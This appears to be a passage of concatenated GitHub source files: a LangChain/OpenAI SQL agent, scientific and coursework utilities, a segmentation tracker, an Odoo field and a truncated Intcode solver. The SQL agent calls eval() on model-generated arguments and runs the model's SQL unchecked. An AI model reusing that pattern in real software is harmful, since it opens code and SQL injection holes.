INFORMATION_SCHEMA.COLUMNS C \n JOIN INFORMATION_SCHEMA.TABLES T ON C.TABLE_NAME = T.TABLE_NAME AND C.TABLE_SCHEMA = T.TABLE_SCHEMA \n WHERE T.TABLE_SCHEMA = '{self.DB_NAME}' \n \"\"\" \n mysql_connection_string = self.createDBConnectionString()\n result = pd.read_sql_query(sql_query, mysql_connection_string)\n df = result.infer_objects()\n output=[]\n current_table = '' \n columns = [] \n for index, row in df.iterrows():\n table_name = f\"{row['TABLE_SCHEMA']}.{row['TABLE_NAME']}\" \n column_name = row['COLUMN_NAME'] \n data_type = row['DATA_TYPE'] \n if \" \" in table_name:\n table_name= f\"[{table_name}]\" \n column_name = row['COLUMN_NAME'] \n if \" \" in column_name:\n column_name= f\"[{column_name}]\" \n # If the table name has changed, output the previous table's information \n if current_table != table_name and current_table != '': \n output.append(f\"table: {current_table}, columns: {', '.join(columns)}\") \n columns = [] \n \n # Add the current column information to the list of columns for the current table \n columns.append(f\"{column_name} {data_type}\") \n \n # Update the current table name \n current_table = table_name \n\n # Output the last table's information \n output.append(f\"table: {current_table}, columns: {', '.join(columns)}\")\n output = \"\\n \".join(output)\n\n return output \n\n def createAgentExecutor(self, openAI_model_name=\"gpt-3.5-turbo\"):\n '''\n Instantiating Langchain agent to query SQL Database.\n Using SQLDatabaseToolkit from Langchain.\n '''\n mysql_connection_string = self.createDBConnectionString()\n llm = ChatOpenAI(model_name= openAI_model_name )\n db = SQLDatabase.from_uri(mysql_connection_string)\n toolkit = SQLDatabaseToolkit(db=db, llm =llm)\n agent_executor = create_sql_agent(\n llm=llm,\n toolkit=toolkit,\n verbose=True,\n return_intermediate_steps=False,\n handle_parsing_errors=True)\n return agent_executor\n\n def fetchQueryResult(self,question):\n '''\n Using langchain's SQL tool to fetch answer to the user's query.\n '''\n db_agent = self.createAgentExecutor()\n schema_info = self.getSQLSchema()\n prompt = f'''You are a professional SQL Data Analyst whose job is to fetch results from the SQL database.\\\n The SQL Table schema is as follows {schema_info}.\\\n The question will be asked in # delimiter. If you are not able to find the answer write \"Found Nothing\" in response.\\\n Do not write anything out of context or on your own.\\\n If the SQL query returns multiple rows then summarize them and provide response using bullet points.For duplicate response after the SQL query consider any one of the result to parse into LLM.\\\n Question : # {question} #'''\n db_agent.return_intermediate_steps=True\n agent_response = db_agent(prompt)\n output = agent_response['output']\n # query = agent_response['intermediate_steps'][-1][0].log.split('\\n')[-1].split('Action Input:')[-1].strip().strip('\"')\n return output \n \n\nclass SQLQuerywithFunctionCalling(SQLQuerywithLangchain):\n def __init__(self):\n super().__init__()\n\n def getMYSQLConnectionObject(self):\n db_user = self.DB_USERNAME\n db_password = self.DB_PASSWORD\n db_host = self.DB_HOST\n db_name = self.DB_NAME\n conn = connection.connect(host=db_host,user=db_user,password=db_password,\n database=db_name, use_pure=True) \n if conn.is_connected():\n return conn\n else:\n return \"Database connection can't be established\"\n \n def defineFunction(self):\n database_schema_string = self.getSQLSchema()\n function = [\n {\n \"name\": \"ask_database\",\n \"description\": \"Use this function to answer user questions about product. Output should be a fully formed SQL query.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"query\": {\n \"type\": \"string\",\n \"description\": f\"\"\"\n SQL query extracting info to answer the user's question.\n SQL should be written using this database schema:\n {database_schema_string}\n The query should be returned in plain text, not in JSON.\n Do not use new lines chatacthers inside the query.\n \"\"\",\n }\n },\n \"required\": [\"query\"],\n },\n }\n ]\n\n return function\n \n def ask_database(self,query):\n \"\"\"Function to query MySQL database with a provided SQL query.\"\"\"\n try:\n conn = self.getMYSQLConnectionObject()\n cursor=conn.cursor() \n cursor.execute(query) \n results = str(cursor.fetchall())\n conn.close()\n except Exception as e:\n results = f\"query failed with error: {e}\"\n return results\n \n def execute_function_call(self,message):\n if message[\"function_call\"][\"name\"] == \"ask_database\":\n query = eval(message[\"function_call\"][\"arguments\"])[\"query\"]\n results = self.ask_database(query)\n else:\n results = f\"Error: function {message['function_call']['name']} does not exist\"\n return results\n \n def openai_functions_chain(self,query):\n messages = []\n messages.append({\"role\": \"system\", \"content\": F\"Answer user questions by generating SQL queries against the {self.DB_NAME} Database.\"})\n messages.append({\"role\": \"user\", \"content\": query})\n while True:\n assistant_message = openai.ChatCompletion.create(\n temperature=0,\n model=\"gpt-3.5-turbo-0613\",\n messages=messages,\n functions=self.defineFunction(),\n function_call=\"auto\",\n )[\"choices\"][0][\"message\"]\n messages.append(assistant_message)\n\n if assistant_message.get(\"function_call\"):\n print(\"Executing function: \", assistant_message[\"function_call\"])\n results = self.execute_function_call(assistant_message)\n messages.append({\"role\": \"function\", \"name\": assistant_message[\"function_call\"][\"name\"], \"content\": results})\n else:\n break\n\n return assistant_message['content']\n \n\n# question = \"what is the count of mobile device type?\"\n# obj = SQLQuerywithFunctionCalling()\n# res = obj.openai_functions_chain(question)\n# print(res)","repo_name":"KDcommits/GenAI-Media-Bot","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"24288950350","text":"import argparse\n\nimport requests\nfrom pathlib import Path\n\n\n# def download(url, path):\n# path.parent.mkdir(exist_ok=True, parents=True)\n#\n# r = requests.get(url, stream=True)\n# if r.ok:\n# with open(path, 'wb') as f:\n# for ch in r:\n# f.write(ch)\n\n\ndef run(cat):\n trans = dict()\n with open(\"IVS/IVS_SrcNamesTable.txt\") as f:\n for l in f:\n if l.startswith(\"#\"):\n continue\n ivs = l[:8].strip()\n iers = l[40:48].strip()\n if iers == \"-\" or iers == \"\":\n continue\n trans[iers] = ivs\n pass\n\n for n1, n2 in cat.items():\n if n1 in trans.keys() and trans[n1] != n2:\n print(f\"rename {n1} to {trans[n1]}\")\n if n1 in trans.keys() and trans[n1] == n2:\n print(f\"{n1} is correctly named {trans[n1]}\")\n if n1 not in trans.keys() and n2 != '$':\n print(f\"missing entry for {n1} {n2}\")\n\n pass\n\n\ndef parse_cat(file):\n cat = dict()\n with open(file) as f:\n for l in f:\n l = l.strip()\n if l.startswith('*'):\n continue\n tmp = l.split()\n n1 = tmp[0]\n n2 = tmp[1]\n cat[n1] = n2\n\n return cat\n\n\ndef parse_skd(file):\n cat = dict()\n read = False\n with open(file) as f:\n for l in f:\n l = l.strip()\n if l.startswith(\"$SOURCES\"):\n read = True\n continue\n if read:\n if l.startswith('$'):\n break\n if l.startswith('*'):\n continue\n tmp = l.strip().split()\n n1 = tmp[0]\n n2 = tmp[1]\n cat[n1] = n2\n\n return cat\n\n\nif __name__ == \"__main__\":\n doc = \"Takes a schedule or source catalog and checks source names against the IVS translation table.\"\n\n parser = argparse.ArgumentParser(description=doc)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-skd', \"--schedule\", help=\"path to input .skd file\")\n group.add_argument('-cat', \"--catalog\", help=\"path to input source catalog\")\n args = parser.parse_args()\n\n if args.catalog is not None:\n cat = parse_cat(args.catalog)\n\n if args.schedule is not None:\n cat = parse_skd(args.schedule)\n\n print(f\"found {len(cat)} sources\")\n\n # download('https://cddis.nasa.gov/archive/vlbi/gsfc/ancillary/solve_apriori/IVS_SrcNamesTable.txt',\n # Path('IVS') / 'IVS_SrcNamesTable.txt')\n\n run(cat)\n","repo_name":"TUW-VieVS/VieSchedpp_AUTO","sub_path":"util/check_src_names.py","file_name":"check_src_names.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"43176745085","text":"import functools\r\nimport csv\r\n\r\n\r\ndef calcular_venta_total():\r\n file = open(\"ventas-dia.csv\", \"r\")\r\n reader = csv.reader(file, delimiter=\",\")\r\n # intermedia = list(map(lambda x: int(x[1])*int(x[2]), reader))\r\n # final = functools.reduce(lambda x1, x2: x1+x2, intermedia)\r\n # file.close()\r\n # return final\r\n archivo_intermedio = list(map(escribir_archivo_intermedio, reader))\r\n final = functools.reduce(reducir, archivo_intermedio)\r\n return final\r\n\r\n\r\ndef escribir_archivo_intermedio(linea):\r\n intermedio = open(\"intermedio.txt\", \"a\")\r\n resultado = int(linea[1])*int(linea[2])\r\n intermedio.write(str(resultado)+\"\\n\")\r\n intermedio.close()\r\n return resultado\r\n\r\n\r\ndef reducir(linea1, linea2):\r\n return int(linea1)+int(linea2)\r\n\r\nif __name__ == '__main__':\r\n print(calcular_venta_total())","repo_name":"guidorombola/EDD-UNTREF","sub_path":"Practicas-Parciales/segundo-parcial/parcial-23-11-15/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39247585740","text":"from pkg_resources import resource_string\nimport logging\n\nfrom core.utils import get_previous_and_next\n\nfrom ...models import Programme\n\n\nlogger = logging.getLogger(\"kompassi\")\n\n\nclass ProgrammeManagementProxy(Programme):\n \"\"\"\n Contains extra methods for Programme used only by management views.\n \"\"\"\n\n def get_overlapping_programmes(self):\n if any(\n (\n self.id is None,\n self.room is None,\n self.start_time is None,\n self.length is None,\n )\n ):\n return ProgrammeManagementProxy.objects.none()\n else:\n return ProgrammeManagementProxy.objects.raw(\n resource_string(__name__, \"sql/overlapping_programmes.sql\").decode(),\n (\n self.category.event.id,\n self.id,\n self.room.id,\n self.start_time,\n self.end_time,\n ),\n )\n\n def get_previous_and_next_programme(self):\n queryset = ProgrammeManagementProxy.objects.filter(category__event=self.category.event).order_by(\"title\")\n return get_previous_and_next(queryset, self)\n\n class Meta:\n proxy = True\n","repo_name":"con2/kompassi","sub_path":"programme/proxies/programme/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"62"} +{"seq_id":"7338612058","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport tqdm\n\nfrom lib.image import imwrite_indexed\nfrom lib.utils import AverageMeter, ConvRelu, MultiReceptiveConv\nfrom .augmenter import ImageAugmenter\nfrom .discriminator import Discriminator\nfrom .seg_network import SegNetwork\nfrom .template_matching import LongtermTemplate\nfrom .GumbelModule import GumbleSoftmax\n\nfrom time import time\nfrom PIL import Image\n\n\n\nclass TargetObject:\n\n def __init__(self, obj_id, disc_params, **kwargs):\n\n self.object_id = obj_id\n self.discriminator = Discriminator(**disc_params)\n self.disc_layer = disc_params.layer\n self.start_frame = None\n self.start_mask = None\n self.index = -1\n\n for key, val in kwargs.items():\n setattr(self, key, val)\n\n def initialize(self, ft, mask):\n self.discriminator.init(ft[self.disc_layer], mask)\n\n def classify(self, ft):\n return self.discriminator.apply(ft)\n\n\nclass Tracker(nn.Module):\n\n def __init__(self, augmenter: ImageAugmenter, feature_extractor, disc_params, Tmatching:LongtermTemplate,\n Tmat_params, refiner: SegNetwork, device):\n\n super().__init__()\n\n self.augmenter = augmenter\n self.augment = augmenter.augment_first_frame\n self.disc_params = disc_params\n self.feature_extractor = feature_extractor\n\n self.refiner = refiner\n for m in self.refiner.parameters():\n m.requires_grad_(False)\n self.refiner.eval()\n\n self.device = device\n\n self.first_frames = []\n self.current_frame = 0\n self.current_masks = None\n self.num_objects = 0\n\n self.Tmat_params = Tmat_params\n self.gateF = self.Tmat_params.gateF\n if self.gateF:\n fc1 = nn.Conv2d(Tmat_params.Tmat_out, 16, kernel_size=3, stride=2, padding=1)\n fc1bn = nn.BatchNorm2d(16)\n fc2 = nn.Conv2d(16, 2, kernel_size=3, stride=2, padding=0)\n # initialize the bias of the last fc for\n # initial opening rate of the gate of about 85%\n # fc2.bias.data[0] = 0.1\n # fc2.bias.data[1] = 2\n layers = []\n layers.append(torch.nn.AdaptiveMaxPool2d(7))\n layers.append(fc1)\n layers.append(fc1bn)\n layers.append(torch.nn.AdaptiveMaxPool2d(3))\n layers.append(fc2)\n self.convGS = torch.nn.Sequential(*layers)\n self.gSelect = GumbleSoftmax(hard=True)\n for m in self.convGS.parameters():\n m.requires_grad_(False)\n self.convGS.eval()\n\n self.Tmatching = Tmatching\n for m in self.Tmatching.parameters():\n m.requires_grad_(False)\n self.Tmatching.eval()\n\n self.Convert_Diff = nn.Conv2d(Tmat_params.Tmat_out, 1, 3, 2, 1)\n for m in self.Convert_Diff.parameters():\n m.requires_grad_(False)\n self.Convert_Diff.eval()\n\n def clear(self):\n self.first_frames = []\n self.current_frame = 0\n self.current_masks = None\n self.num_objects = 0\n torch.cuda.empty_cache()\n\n\n def run_dataset(self, dataset, out_path, speedrun=False, restart=None, this_th=0.7):\n \"\"\"\n :param dataset: Dataset to work with (See datasets.py)\n :param out_path: Root path for storing label images. Sequences of label pngs will be created in subdirectories.\n :param speedrun: [Optional] Whether or not to warm up Pytorch when measuring the run time. Default: False\n :param restart: [Optional] Name of sequence to restart from. Useful for debugging. Default: None\n \"\"\"\n out_path.mkdir(exist_ok=True, parents=True)\n\n dset_fps = AverageMeter()\n\n print('Evaluating', dataset.name)\n avg_open, N =0, 0\n restarted = False\n for sequence in dataset:\n if restart is not None and not restarted:\n if sequence.name != restart:\n continue\n restarted = True\n\n # We preload data as we cannot both read from disk and upload to the GPU in the background,\n # which would be a reasonable thing to do. However, in PyTorch, it is hard or impossible\n # to upload images to the GPU in a data loader running as a separate process.\n sequence.preload(self.device)\n self.clear() # Mitigate out-of-memory that may occur on some YouTubeVOS sequences on 11GB devices.\n outputs, seq_fps, count_gate,scores = self.run_sequence(sequence, speedrun, this_th=this_th)\n dset_fps.update(seq_fps)\n\n dst = out_path / sequence.name\n dst.mkdir(exist_ok=True)\n idx=0\n for lb, f in zip(outputs, sequence.frame_names):\n imwrite_indexed(dst / (f + \".png\"), lb)\n # if idx >0:\n # for obj in range(len(scores[idx-1])):\n # this_s = scores[idx-1][obj]\n # im = Image.fromarray(this_s, 'P')\n # im.save(dst / (f + \"_\" +str(obj)+\".png\"))\n\n idx+=1\n for i in range(len(count_gate)):\n avg_open+=count_gate[i]\n N+=1\n\n\n print(\"Average frame rate: %.2f fps\" % dset_fps.avg)\n print(\"Total obj {} reuse Rate {} from {}\".format(N, avg_open / N, avg_open))\n return dset_fps.avg, avg_open / N\n\n def run_sequence(self, sequence, speedrun=False, this_th=0.3):\n \"\"\"\n :param sequence: FileSequence to run.\n :param speedrun: Only for DAVIS 2016: If True, let pytorch initialize its buffers in advance\n to not incorrectly measure the memory allocation time in the first frame.\n :return:\n \"\"\"\n\n self.eval()\n self.object_ids = sequence.obj_ids\n self.current_frame = 0\n self.targets = dict()\n\n self.Templates = dict()\n self.gate_result= dict()\n self.prev_score= dict()\n self.prevRefine = dict()\n\n N = 0\n\n object_ids = torch.tensor([0] + sequence.obj_ids, dtype=torch.uint8, device=self.device) # Mask -> labels LUT\n count_gate =dict()\n count_frame = dict()\n if speedrun:\n image, labels, obj_ids = sequence[0]\n image = image.to(self.device)\n labels = labels.to(self.device)\n self.initialize(image, labels, sequence.obj_ids) # Assume DAVIS 2016\n self.track(image, this_th)\n torch.cuda.synchronize()\n self.targets = dict()\n\n self.Templates = dict()\n self.gate_result = dict()\n self.prev_score = dict()\n self.prevRefine=dict()\n\n outputs = []\n t0 = time()\n out_score=[]\n for i, (image, labels, new_objects) in tqdm.tqdm(enumerate(sequence), desc=sequence.name, total=len(sequence), unit='frames'):\n\n old_objects = set(self.targets.keys())\n\n image = image.to(self.device)\n if len(new_objects) > 0:\n labels = labels.to(self.device)\n self.initialize(image, labels, new_objects)\n\n if len(old_objects) > 0:\n _, scores= self.track(image, this_th)\n out_score.append(scores)\n\n masks = self.current_masks\n if len(sequence.obj_ids) == 1:\n labels = object_ids[(masks[1:2] > 0.5).long()]\n else:\n masks = torch.clamp(masks, 1e-7, 1 - 1e-7)\n masks[0:1] = torch.min((1 - masks[1:]), dim=0, keepdim=True)[0] # background activation\n segs = F.softmax(masks / (1 - masks), dim=0) # s = one-hot encoded object activations\n labels = object_ids[segs.argmax(dim=0)]\n\n if isinstance(labels, list) and len(labels) == 0: # No objects yet\n labels = image.new_zeros(1, *image.shape[-2:])\n\n for k, v in self.gate_result.items():\n try:\n count_gate[k] = count_gate[k] +v\n count_frame[k] = count_frame[k]+1\n except:\n count_gate[k] = v\n count_frame[k] =1\n\n\n outputs.append(labels)\n self.current_frame += 1\n N += 1\n\n torch.cuda.synchronize()\n T = time() - t0\n fps = N / T\n avg_gate=[]\n for k, v in count_gate.items():\n print(\"{} th obj open percent {}\".format(k, count_gate[k] / count_frame[k]))\n avg_gate.append(count_gate[k] / count_frame[k])\n\n return outputs, fps, avg_gate,out_score\n\n def initialize(self, image, labels, new_objects):\n\n self.current_masks = torch.zeros((len(self.targets) + len(new_objects) + 1, *image.shape[-2:]),\n device=self.device)\n with torch.no_grad():\n ft = self.feature_extractor(image)\n ft8 = ft[self.Tmat_params.layer]\n ft16 = ft[self.disc_params.layer]\n _, _, H, W = ft8.size()\n self.H8, self.W8 = H, W\n\n for obj_id in new_objects:\n # Create target\n\n mask = (labels == obj_id).byte()\n target = TargetObject(obj_id=obj_id, index=len(self.targets) + 1, disc_params=self.disc_params,\n start_frame=self.current_frame, start_mask=mask)\n self.targets[obj_id] = target\n if obj_id != target.index:\n print(\"obj_id: {} , target_index: {}\".format(obj_id, target.index))\n self.gate_result[obj_id] = 1\n\n # HACK for debugging\n torch.random.manual_seed(0)\n np.random.seed(0)\n\n # Augment first image and extract features\n\n im, msk = self.augment(image, mask)\n with torch.no_grad():\n ft_disc = self.feature_extractor(im)\n target.initialize(ft_disc, msk)\n\n mask = mask.unsqueeze(0)\n prev_seg8 = torch.nn.Upsample(size=(self.H8, self.W8), mode='nearest')(mask.float())\n self.Templates[obj_id] = self.Tmatching(ft8, prev_seg8, None, 0, mode=\"M\")\n self.current_masks[target.index] = mask\n _, _, H, W = ft[self.disc_params.layer].size()\n self.prev_score[obj_id] = torch.nn.Upsample(size=(H, W), mode='nearest')(mask.float())\n scores = target.classify(ft16)\n prevX = self.refiner.Test_Init(scores, ft)\n self.prevRefine[obj_id] = prevX\n\n return self.current_masks\n\n def track(self, image, this_th):\n\n im_size = image.shape[-2:]\n features = self.feature_extractor.get_F8(image)\n\n # Classify\n ft8 = features[self.Tmat_params.layer]\n scores=[]\n for obj_id, target in self.targets.items():\n if target.start_frame < self.current_frame:\n # using gating function for check needs of calculate score map\n PrevScore8 = nn.Upsample(size=(self.H8, self.W8), mode='bilinear')(self.prev_score[obj_id])\n tplS = self.Tmatching(torch.cat([ft8,PrevScore8],dim=1), self.Templates[obj_id], mode=\"Q\")\n fc_f = self.convGS(tplS).squeeze(2).squeeze(2)\n\n _,gateProb = self.gSelect(fc_f)\n\n if gateProb[0,0]>this_th:\n gate=1\n else:\n gate=0\n self.gate_result[obj_id] = gate\n\n if gate ==0: # we need to calculate\n PostFeatures = self.feature_extractor.get_F32(ft8)\n ft16 = PostFeatures[self.disc_params.layer]\n s = target.classify(ft16)\n features.update(PostFeatures)\n Diff=None\n self.prev_score[obj_id] =s.clone()\n else: # Do not need to calcualte just translate\n Diff = self.Convert_Diff(tplS)\n s = self.prev_score[obj_id] + Diff\n\n Sout=s.squeeze(0).squeeze(0)\n S_min=torch.min(Sout)\n S_max=torch.max(Sout)\n Sout=((255*(Sout-S_min))/(S_max-S_min)).cpu().byte().numpy()\n scores.append(Sout)\n\n y, prevX = self.refiner.Test_Forward(s, features,gate, self.prevRefine[obj_id], Diff, im_size)\n self.prevRefine[obj_id] = prevX\n self.current_masks[target.index] = torch.sigmoid(y)\n\n # Update\n\n for obj_id, t1 in self.targets.items():\n if t1.start_frame < self.current_frame:\n for obj_id2, t2 in self.targets.items():\n if obj_id != obj_id2 and t2.start_frame == self.current_frame:\n self.current_masks[t1.index] *= (1 - t2.start_mask.squeeze(0)).float()\n\n p = torch.clamp(self.current_masks, 1e-7, 1 - 1e-7)\n p[0:1] = torch.min((1 - p[1:]), dim=0, keepdim=True)[0] # bg prob\n segs = F.softmax(p / (1 - p), dim=0) # prob_cls/!prob_cls\n inds = segs.argmax(dim=0)\n\n # self.out_buffer = segs * F.one_hot(inds, segs.shape[0]).permute(2, 0, 1)\n for i in range(self.current_masks.shape[0]):\n self.current_masks[i] = segs[i] * (inds == i).float()\n\n for obj_id, target in self.targets.items():\n if target.start_frame < self.current_frame and self.disc_params.update_filters and self.gate_result[obj_id] ==0:\n target.discriminator.update(self.current_masks[target.index].unsqueeze(0).unsqueeze(0))\n\n\n return self.current_masks, scores\n\n\n","repo_name":"HYOJINPARK/Reuse_VOS","sub_path":"model/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":13619,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"62"} +{"seq_id":"74405097798","text":"import sqlite3\nimport unittest\n\nfrom Archive import historicals\n\n\nclass MyTest(unittest.TestCase):\n def test_ConnectionError(self):\n stat = historicals.connect_db('Portfolio.db', 'C:/')\n self.assertEqual(stat[1],'Error')\n def test_ConnectWorking(self):\n stat = historicals.connect_db('Portfolio.db', 'K:/')\n self.assertEqual(stat[1],None)\n def test_DBEmpty(self):\n #create an empty database from scratch, connect and check if the table is working\n con = sqlite3.connect(\":memory:\")\n cur = con.cursor()\n stat = historicals.DB_Empty(con)\n self.assertEqual(stat,True)\n def test_TableExists(self):\n con = sqlite3.connect(\":memory:\")\n cur = con.cursor()\n stat = historicals.Table_Exists(con, 'Test')\n self.assertEqual(stat, False)\n conn.close()\nif __name__=='__main__':\n unittest.main()","repo_name":"das-soham/PortfolioBuilder","sub_path":"tests/test_historicals.py","file_name":"test_historicals.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74558950277","text":"'''\n快速排序\n时间复杂度:最好O(nlogn),最坏O(n2),稳定性,不稳定\n\n通过一趟排序将要排序的数据分割成独立的两部分,其中一部分的所有数据都比另外一部分的所有数据都要小,\n然后再按此方法对这两部分数据分别进行快速排序,整个排序过程可以递归进行,以此达到整个数据变成有序序列。\n\n'''\n\n\n# 快速排序\n# 有自身递归\ndef quick_sort(array):\n if len(array) < 2:\n return array # 基线条件 为空或包含一个元素\n else:\n pivot = array[0] # 基准值\n less = [i for i in array[1:] if i <= pivot]\n greater = [i for i in array[1:] if i > pivot]\n return quick_sort(less) + [pivot] + quick_sort(greater)\n\nif __name__ == '__main__':\n list = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n print(quick_sort(list))","repo_name":"xiafei-xupt/MY_PY","sub_path":"快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"16023201830","text":"# 220531\n# N과 M(4)\n# 자연수 N과 M이 주어졌을 때, 아래 조건을 만족하는 길이가 M인 수열을 모두 구하는 프로그램\n# 조건1) 1부터 N까지의 자연수 중에서 M개를 고른 수열\n# 조건2) 같은 수를 여러 번 골라도 된다.\n# 조건3) 고른 수열은 비내림차순이어야 한다.\n# 비내림차순 : 길이가 K인 수열 A가 A1 <= A2 <= ... <= Ak-1 <= Ak를 만족\n\n# 입력 : N M (1 <= M <= N <= 8)\n\n# 출력 : 한 줄에 하나씩 문제의 조건을 만족하는 수열 출력\n# 수열은 사전 순으로 증가하는 순서로 출력\n\ndef dfs(idx):\n if len(k) == m:\n print(*k)\n return\n\n for i in range(idx, n): # 선택하는 원소의 범위를 arr[idx] ~ arr[n-1]로 좁히기\n k.append(arr[i]) # arr[i] 선택\n dfs(i) # arr[i]보다 작은 원소는 선택 x\n k.pop()\n\nn, m = map(int, input().split())\narr = [i for i in range(1, n + 1)]\n\nk = []\ndfs(0)","repo_name":"monacaron/BOJ","sub_path":"15652_N&M(4).py","file_name":"15652_N&M(4).py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21861637004","text":"import pygame\nimport game\nimport time\nimport assets.colours as colours\n\nfrom .button import Button\n\nclass MenuButton(Button):\n \n def __init__(self, interface, x=0, y=0, width=0, height=0, font=None, text=None, highlight_text=None):\n super().__init__(interface, x, y, width, height, font, text)\n\n self.font = pygame.font.Font(None, 30)\n self.highlight_text = highlight_text\n\n self.default_text_colour = self.text_colour = colours.GREY_BLACK,\n self.default_outer_rect_colour = self.outer_rect_colour = colours.BOARD\n self.default_text = self.text\n\n def draw(self):\n \"\"\"\n This funciton daws the menu button \n - its base rectangle\n - the inner rectangle and,\n - the text\n \n If the user hovers over the button its outer rectangle and text are both changed\n The default layout will be the board grid size, say:\n 4X4\n 5X5\n\n Upon highlighting over it we will see the grid goal. e.g. 2048/4096\n \"\"\"\n self._draw_base_rectangle()\n\n if self.hover:\n self.outer_rect_colour = colours.YELLOW\n self.text_colour = colours.WHITE \n self.text = self.highlight_text\n \n else:\n self.outer_rect_colour = self.default_outer_rect_colour\n self.text_colour = self.default_text_colour\n self.text = self.default_text\n self._draw_inner_rectangle()\n\n self._draw_text()\n self.screen.blit(self.surface, (self.rect.x , self.rect.y)) \n\n \"\"\"The following 4 functions are self explanatory\"\"\"\n def _draw_base_rectangle(self):\n outer_rect = pygame.Rect(0, 0, self.width, self.height)\n pygame.draw.rect(self.surface, self.outer_rect_colour, outer_rect, border_radius=5)\n\n def _draw_inner_rectangle(self):\n inner_x = self.width * 0.1 // 2\n inner_y = self.height * 0.2 // 2\n inner_rect = pygame.Rect(inner_x, inner_y, self.width*0.9, self.height*0.8)\n pygame.draw.rect(self.surface, colours.DEFUALT_TILE, inner_rect, border_radius=5)\n\n def _draw_text(self):\n text = self.font.render(self.text, True, self.text_colour)\n text_x = (self.width - text.get_width()) // 2\n text_y = (self.height - text.get_height()) // 2\n self.surface.blit(text, (text_x, text_y))\n \n\n def dissolve(self, start_time):\n \"\"\"\n This function changes the transparency of the buttons over 1s to give the appearance of dissolving\n \"\"\"\n # Calculate the time elapsed since the start of the loop\n elapsed_time = pygame.time.get_ticks() - start_time\n\n # Calculate the current alpha value based on elapsed time\n current_alpha = max(0, 255 - (255 * elapsed_time / 1000))\n\n # Set the new alpha value for the rectangle\n self.surface.set_alpha(int(current_alpha))\n\n if current_alpha == 0: \n game.start_time = time.time()\n return True\n \n","repo_name":"LunaTMT/2048","sub_path":"buttons/menu_button.py","file_name":"menu_button.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"3811182869","text":"import cv2\r\nimport mediapipe as mp\r\nimport handtrackingmodule as htm\r\n\r\npTime = 0\r\ncTime = 0\r\ncap = cv2.VideoCapture(0)\r\ntracker = htm.handTracker()\r\n\r\nwhile True:\r\n success,image = cap.read()\r\n image = tracker.handsFinder(image)\r\n lmList = tracker.positionFinder(image)\r\n if len(lmList) != 0:\r\n print(lmList[4])\r\n\r\n cTime = time.time()\r\n fps = 1/(cTime -pTime)\r\n pTime = cTime\r\n\r\n cv2.putText(image, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3,\r\n (255, 0, 255), 3)\r\n\r\n cv2.imshow(\"Video\",image)\r\n cv2.waitKey(1)","repo_name":"Tabeebashraf7/hand-detection-module","sub_path":"mynewgamehand.py","file_name":"mynewgamehand.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"28420513368","text":"from odoo import api, fields, models,_\n\nclass Lead(models.Model):\n _inherit = \"crm.lead\"\n\n z_project_site = fields.Many2one('site.name',string=\"Project Site\")\n\n z_partner_id = fields.Many2one('res.partner', string='Customer', track_visibility='onchange', track_sequence=1, index=True,\n help=\"Linked partner (optional). Usually created when converting the lead. You can find a partner by its Name, TIN, Email or Internal Reference.\")\n active = fields.Boolean('Active', default=True, track_visibility=True)\n\n","repo_name":"tgy5719/mcl","sub_path":"addon_fields_for_mcl/model/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"36687838388","text":"import os\nfrom collections import defaultdict\nimport networkx as nx\nimport requests\nimport requests_cache\nfrom intcode import IntCode\n\ndirections = {\n 1: (0, 1),\n 2: (0, -1),\n 3: (-1, 0),\n 4: (1, 0)\n}\n\nWALL = \"#\"\nOXYGEN = \"x\"\nMOVE = \".\"\n\n\ndef part1(lines):\n program = IntCode(lines)\n grid = create_grid(program)\n\n graph = nx.Graph()\n for coord, area in grid.items():\n if not area == WALL:\n graph.add_node(coord)\n new_positions = [new_pos(coord, d) for d in directions.values()]\n not_blocking = [i for i in new_positions if not grid[i] == WALL]\n for edge in not_blocking:\n graph.add_edge(coord, edge)\n path = nx.shortest_path_length(graph, (0, 0), get_target(grid))\n\n return path\n\n\ndef part2(lines):\n program = IntCode(lines)\n grid = create_grid(program)\n return fill_oxygen(grid, get_target(grid), 0, 0)\n\n\ndef get_target(grid):\n return [i for i in grid if grid[i] == OXYGEN][0]\n\n\ndef new_pos(pos, direction):\n return pos[0] + direction[0], pos[1] + direction[1]\n\n\ndef create_grid(program):\n known_cells = defaultdict(int)\n grid = defaultdict(str)\n pos = (0, 0)\n\n while not program.halt and sum(known_cells.values()) < 10000: # arbitrary high number\n direction = find_next_area(grid, pos, known_cells)\n output = program.operation(direction)\n move = directions[direction]\n known_cells[pos] += 1\n\n if output == 0:\n new_position = new_pos(pos, move)\n grid[new_position] = WALL\n\n else:\n pos = new_pos(pos, move)\n grid[pos] = MOVE if output == 1 else OXYGEN\n\n return 